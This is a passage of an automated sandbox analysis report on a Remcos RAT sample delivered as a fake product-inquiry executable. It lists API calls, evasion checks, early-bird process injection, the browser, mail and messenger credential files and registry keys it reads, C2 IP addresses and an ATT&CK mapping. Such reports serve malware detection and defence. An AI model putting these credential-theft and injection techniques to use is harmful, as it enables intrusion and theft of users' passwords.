            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeAPI/Special instruction interceptor: Address: 3A5CA99
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7555Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2070Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeAPI coverage: 4.5 %
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeAPI coverage: 9.9 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe TID: 4072Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00402902 FindFirstFileW,6_2_00402902
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00406739 FindFirstFileW,FindClose,6_2_00406739
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405AED
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_221C10F1
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00418981 memset,GetSystemInfo,7_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(Q
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeAPI call chain: ExitProcess graph end nodegraph_0-3726
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeAPI call chain: ExitProcess graph end nodegraph_0-3731
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04A0F3C4 LdrInitializeThunk,2_2_04A0F3C4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_221C2639
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,7_2_004044A4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C4AB4 mov eax, dword ptr fs:[00000030h]6_2_221C4AB4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C724E GetProcessHeap,6_2_221C724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_221C2639
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_221C2B1C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe base: 16C0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe "C:\Users\user\AppData\Local\Temp\Hedgiest165.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\fwvclzunqobhontovwjupvveekchrmo"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\pybvmrepextuythsmgwvzaqvnquqkxftlb"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeProcess created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\zsggmk"Jump to behavior
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_221C2264
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,8_2_004082CD
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hedgiest165.exe PID: 2472, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: EntryPoint, ESMTPPassword8_2_004033F0
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword8_2_00402DB3
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword8_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: Hedgiest165.exe PID: 2472, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Hedgiest165.exe PID: 2232, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-CK59IOJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hedgiest165.exe PID: 2472, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            2
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            Logon Script (Windows)412
            Process Injection
            2
            Software Packing
            1
            Credentials In Files
            2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS119
            System Information Discovery
            Distributed Component Object Model2
            Clipboard Data
            1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets141
            Security Software Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture112
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1552404 Sample: Image_Product_Inquiry_Reque... Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 32 geoplugin.net 2->32 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 7 other signatures 2->54 9 Image_Product_Inquiry_Request_Villoslada.exe 30 2->9         started        signatures3 process4 process5 11 powershell.exe 28 9->11         started        file6 28 C:\Users\user\AppData\...\Hedgiest165.exe, PE32 11->28 dropped 30 C:\Users\...\Hedgiest165.exe:Zone.Identifier, ASCII 11->30 dropped 62 Early bird code injection technique detected 11->62 64 Writes to foreign memory regions 11->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 11->66 68 3 other signatures 11->68 15 Hedgiest165.exe 3 13 11->15         started        19 conhost.exe 11->19         started        signatures7 process8 dnsIp9 34 185.150.191.117, 4609, 49979, 49981 RELIABLESITEUS United States 15->34 36 103.72.57.120, 49950, 80 NETEASE-ASGuangzhouNetEaseComputerSystemCoLtdCN India 15->36 38 geoplugin.net 178.237.33.50, 49980, 80 ATOM86-ASATOM86NL Netherlands 15->38 40 Detected unpacking (changes PE section rights) 15->40 42 Detected Remcos RAT 15->42 44 Tries to steal Mail credentials (via file registry) 15->44 46 2 other signatures 15->46 21 Hedgiest165.exe 1 15->21         started        24 Hedgiest165.exe 1 15->24         started        26 Hedgiest165.exe 14 15->26         started        signatures10 process11 signatures12 56 Tries to steal Instant Messenger accounts or passwords 21->56 58 Tries to harvest and steal browser information (history, passwords, etc) 21->58 